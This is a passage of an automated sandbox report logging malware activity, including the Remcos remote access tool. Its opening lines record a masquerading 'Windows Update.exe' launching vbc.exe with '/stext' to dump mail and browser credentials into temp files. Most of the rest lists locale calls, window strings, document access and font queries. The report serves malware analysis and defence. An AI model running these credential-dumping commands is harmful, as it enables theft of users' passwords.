                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holdermail.txt"
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holderwb.txt"
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exe Code function: 4_2_00415968 StrToIntA,mouse_event,4_2_00415968
                    Source: bin.exe, 00000003.00000002.932527143.0000000000D50000.00000004.00000001.sdmp Binary or memory string: Program Manager
                    Source: bin.exe, 00000003.00000002.932256911.0000000000CE0000.00000004.00000020.sdmp Binary or memory string: Program ManagernS
                    Source: bin.exe, 00000003.00000002.939576045.0000000003B6F000.00000004.00000010.sdmp, bin.exe, 00000003.00000002.936457109.0000000001370000.00000002.00020000.sdmp, cmd.exe, 00000009.00000002.937478305.00000000033C0000.00000002.00020000.sdmp, remcos.exe, 0000000D.00000002.937515727.0000000000CD0000.00000002.00020000.sdmp, remcos.exe, 0000000D.00000002.939248564.0000000003429000.00000004.00000001.sdmp Binary or memory string: Program Manager
                    Source: bin.exe, 00000003.00000002.939597757.0000000003B7F000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.940953351.0000000003F90000.00000040.00000001.sdmp Binary or memory string: GetProgmanWindow
                    Source: bin.exe, 00000003.00000002.936457109.0000000001370000.00000002.00020000.sdmp, cmd.exe, 00000009.00000002.937478305.00000000033C0000.00000002.00020000.sdmp, remcos.exe, 0000000D.00000002.937515727.0000000000CD0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
                    Source: bin.exe, 00000003.00000002.932256911.0000000000CE0000.00000004.00000020.sdmp Binary or memory string: Program ManagerPS
                    Source: remcos.exe, 0000000D.00000002.939248564.0000000003429000.00000004.00000001.sdmp Binary or memory string: Program Manager!@
                    Source: bin.exe, 00000003.00000002.936457109.0000000001370000.00000002.00020000.sdmp, cmd.exe, 00000009.00000002.937478305.00000000033C0000.00000002.00020000.sdmp, remcos.exe, 0000000D.00000002.937515727.0000000000CD0000.00000002.00020000.sdmp Binary or memory string: Progman
                    Source: remcos.exe, 0000000D.00000002.939248564.0000000003429000.00000004.00000001.sdmp Binary or memory string: Program Manager2@
                    Source: bin.exe, 00000003.00000002.932527143.0000000000D50000.00000004.00000001.sdmp Binary or memory string: Program Manager1>'
                    Source: bin.exe, 00000003.00000002.932527143.0000000000D50000.00000004.00000001.sdmp Binary or memory string: Program Manager9>?
                    Source: bin.exe, 00000003.00000002.936457109.0000000001370000.00000002.00020000.sdmp, cmd.exe, 00000009.00000002.937478305.00000000033C0000.00000002.00020000.sdmp, remcos.exe, 0000000D.00000002.937515727.0000000000CD0000.00000002.00020000.sdmp Binary or memory string: Progmanlock
                    Source: bin.exe, 00000003.00000002.932527143.0000000000D50000.00000004.00000001.sdmp Binary or memory string: Program Managerq>g
                    Source: remcos.exe, 0000000D.00000002.939248564.0000000003429000.00000004.00000001.sdmp, remcos.exe, 0000000D.00000002.938213946.0000000002946000.00000004.00000010.sdmp Binary or memory string: |Program Manager|
                    Source: bin.exe, 00000003.00000002.929737326.000000000021D000.00000004.00020000.sdmp Binary or memory string: C:\Users\user\AppData\Local\Microsoft Vision\07-12-2021_13.38.52{Program Manager}
                    Source: bin.exe, 00000003.00000002.939597757.0000000003B7F000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.940953351.0000000003F90000.00000040.00000001.sdmp Binary or memory string: SetProgmanWindow
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exe Code function: EnumSystemLocalesW,4_2_00443157
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,4_2_0044B1A8
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exe Code function: GetLocaleInfoA,4_2_0040D22F
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exe Code function: EnumSystemLocalesW,4_2_0044B46B
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exe Code function: EnumSystemLocalesW,4_2_0044B420
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exe Code function: EnumSystemLocalesW,4_2_0044B506
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,4_2_0044B593
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exe Code function: GetLocaleInfoW,4_2_00443640
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exe Code function: GetLocaleInfoW,4_2_0044B7E3
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_0044B90C
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exe Code function: GetLocaleInfoW,4_2_0044BA13
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_0044BAE0
                    Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\21.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Files.zip VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\21.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Files\LSBIHQFDVT.pdf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\21.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Files\SFPUSAFIOL.pdf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\21.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Files\SFPUSAFIOL.xlsx VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\21.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Files\SQRKHNBNYN.docx VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\21.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Files\SQRKHNBNYN.pdf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\21.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Files\UOOJJOZIRH.xlsx VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\21.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Files\VAMYDFPUND.docx VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\21.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Files\VAMYDFPUND.xlsx VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\21.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Files\ZTGJILHXQB.docx VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\21.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\BURPLQ1DAW.zip VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\5.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
